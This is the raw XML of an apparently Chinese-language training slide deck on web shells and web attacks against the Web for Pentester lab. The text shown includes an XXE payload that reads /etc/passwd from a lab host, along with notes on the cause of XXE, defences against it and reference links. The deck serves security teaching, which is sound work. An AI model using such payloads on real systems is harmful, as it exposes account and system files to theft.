          <a:xfrm>
            <a:off x="440387" y="2514725"/>
            <a:ext cx="1512168" cy="4320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E6B0D79-F89B-4A50-8723-D7FD18DF6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433" y="3485761"/>
            <a:ext cx="65532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627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XML attacks Example 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493096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="925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修改網址後的參數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 192.168.43.212/xml/example1.php?xml=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E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跳轉後會看到網址為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 192.168.43.212/xml/example1.php?xml=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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&lt;!DOCTYPE test [&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400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xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2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SYSTEM "file%3A%2f%2f%2fetc%2fpasswd"&gt;]&gt;&lt;test&gt;%26xxe%3B&lt;%2ftest&gt;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493D30-7DC7-4923-9926-A9924BFCE35F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6384512"/>
            <a:ext cx="7379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http://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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56159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XML attacks Example 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實戰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A433848-38D0-42FF-9C49-F728A2E90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012" y="2564904"/>
            <a:ext cx="8435975" cy="344931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C493D30-7DC7-4923-9926-A9924BFCE35F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6384512"/>
            <a:ext cx="7379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http://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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10482B0-BFF0-4771-A770-BA0650F094AD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435280" cy="4493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網頁顯示出了伺服器的所有帳號密碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="24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85311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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW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程式分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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﻿ XML attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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Exp 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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38511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XML attacks Example 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0912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造成外部實體注入的原因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由於程式在解析輸入的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資料時，解析了攻擊者偽造的外部實體而產生的。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xxe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漏洞可以進行檔案讀取，拒絕服務攻擊，命令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SQL(XSS)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注入，內外掃描埠，入侵內網站點等。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防範方式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使用開發語言提供的禁用外部實體的方法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過濾使用者提交的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032C60-C6AF-438F-B254-F7EDCE379B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65704" y="6384512"/>
            <a:ext cx="7379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http://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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42127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參考文獻</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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20714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參考文獻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https://en.wikipedia.org/wiki/Web_shell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Shells Penetration Testing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https://www.hackingarticles.in/web-shells-penetration-testing/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/>
              <a:t>常見</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試靶場系統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http://blog.peterhome.idv.tw/index.php/2020/01/02/116/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/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Pentester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Lab: Web For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Pentester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https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/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4959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6455D5B-C4CE-41BC-AF40-DB9D3062E7DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="6398696"/>
            <a:ext cx="5670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http://blog.peterhome.idv.tw/index.php/2020/01/02/116/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漏洞平台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7715200" cy="604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2.KALI DVWA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8D071FB-3744-485D-820C-194C2526CDBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3463600"/>
            <a:ext cx="8229600" cy="2662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Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0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是基於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0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Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0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dirty="0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發行版，設計用於數位鑑識和滲透測試。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="55555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DVWA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PHP+Mysql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編寫的一套用於常規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漏洞教學與檢測的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脆弱性測試程序。包含了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注入、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、盲注等常見的一些安全漏洞。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D50335-B93B-4ADD-A29C-3D93E32B5433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="6145080"/>
            <a:ext cx="3938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https://zh.wikipedia.org/wiki/Kali_Linux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42A114-1686-436C-93B7-7C1E89FAE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73" y="2241889"/>
            <a:ext cx="2123175" cy="124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新手指南：DVWA-1.9全级别教程（完结篇，附实例）之XSS - FreeBuf ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E92682-1A63-4DFF-904F-847248E0A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190125"/>
            <a:ext cx="1800200" cy="122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4724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參考文獻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Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://zh.wikipedia.org/wiki/Kali_Linux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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>PentesterLab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>] Web for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://f4l13n5n0w.github.io/blog/2015/05/21/pentesterlab-web-for-pentester-xss/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PentesterLab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - SQL injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://honglung.pixnet.net/blog/post/85892242-pentesterlab---sql-injections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Web for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -- Directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/kaiho/p/8276865.html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9462112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參考文獻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Web For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -- File Include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/weixin_30723433/article/details/99806436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Web for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -- code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/kaiho/p/8303323.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/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PentesterLab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 Commands injection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http://honglung.pixnet.net/blog/post/85890571-pentesterlab---commands-injection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PentesterLab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 LDAP attacks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http://honglung.pixnet.net/blog/post/85989361-pentesterlab---ldap-attacks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58459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參考文獻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弱點那些事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】LDAP NULL BASE Search Access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https://laoomiaoo.blogspot.com/2017/05/ldap-null-base-search-access.html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For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Pentester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File upload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https://blog.csdn.net/ahu0076/article/details/102029021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PentesterLab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 XML attacks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http://honglung.pixnet.net/blog/post/86029843-pentesterlab---xml-attacks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XXE(XML External Entity attack)XML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外部實體注入攻擊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https://www.itread01.com/content/1550090717.html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4031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for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Pentester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平台建置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首先連線網站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https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/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然後參照下圖，找到並下載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iso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檔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3F09C90-F151-4F4A-B81D-E70C698AD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65104"/>
            <a:ext cx="9144000" cy="1441373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="箭號: 向下 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71C00878-C1F6-4173-A75B-E159CB392BD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="5062971" y="4073477"/>
            <a:ext cx="484632" cy="9784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433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3031</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>370</Paragraphs>
  <Slides>82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82</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="86" baseType="lpstr">
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Web Shells 實戰測試</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Web shell</vt:lpstr>
      <vt:lpstr>2020-04-24 News</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>漏洞平台</vt:lpstr>
      <vt:lpstr>漏洞平台</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>Web for Pentester 平台建置</vt:lpstr>
      <vt:lpstr>測試環境</vt:lpstr>
      <vt:lpstr>KALI Web Shell 檔案</vt:lpstr>
      <vt:lpstr>Web for Pentester IP</vt:lpstr>
      <vt:lpstr>KALI 連線 Web for Pentester</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Web shell實戰測試</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> XSS Example 1 實戰</vt:lpstr>
      <vt:lpstr> XSS Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> XSS Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> SQL injections Example 1 實戰</vt:lpstr>
      <vt:lpstr> SQL injections Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> SQL injections Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> ﻿Directory traversal  Example 1 實戰</vt:lpstr>
      <vt:lpstr> Directory traversal  Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Directory traversal  Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> File Include Example 1 實戰</vt:lpstr>
      <vt:lpstr> File Include Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> File Include Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Code injection Example 1 實戰</vt:lpstr>
      <vt:lpstr> Code injection Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Code injection Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Commands injection  Example 1 實戰</vt:lpstr>
      <vt:lpstr> Commands injection  Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> Commands injection  Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> LDAP attacks Example 1 實戰</vt:lpstr>
      <vt:lpstr> LDAP attacks Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> LDAP attacks Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> File Upload Example 1 實戰</vt:lpstr>
      <vt:lpstr> File Upload Example 1 實戰</vt:lpstr>
      <vt:lpstr> File Upload Example 1 實戰</vt:lpstr>
      <vt:lpstr> File Upload Example 1 實戰</vt:lpstr>
      <vt:lpstr> File Upload Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> File Upload Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>XML attacks Example 1 實戰</vt:lpstr>
      <vt:lpstr> XML attacks Example 1 實戰</vt:lpstr>
      <vt:lpstr> XML attacks Example 1 實戰</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> XML attacks Example 1 分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>參考文獻</vt:lpstr>
      <vt:lpstr>參考文獻</vt:lpstr>
      <vt:lpstr>參考文獻</vt:lpstr>
      <vt:lpstr>參考文獻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Shells實戰測試</dc:title>
  <dc:creator>I3301</dc:creator>
  <cp:lastModifiedBy>TB</cp:lastModifiedBy>
  <cp:revision>225</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-25T07:15:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-26T13:32:11Z</dcterms:modified>
</cp:coreProperties>
</file>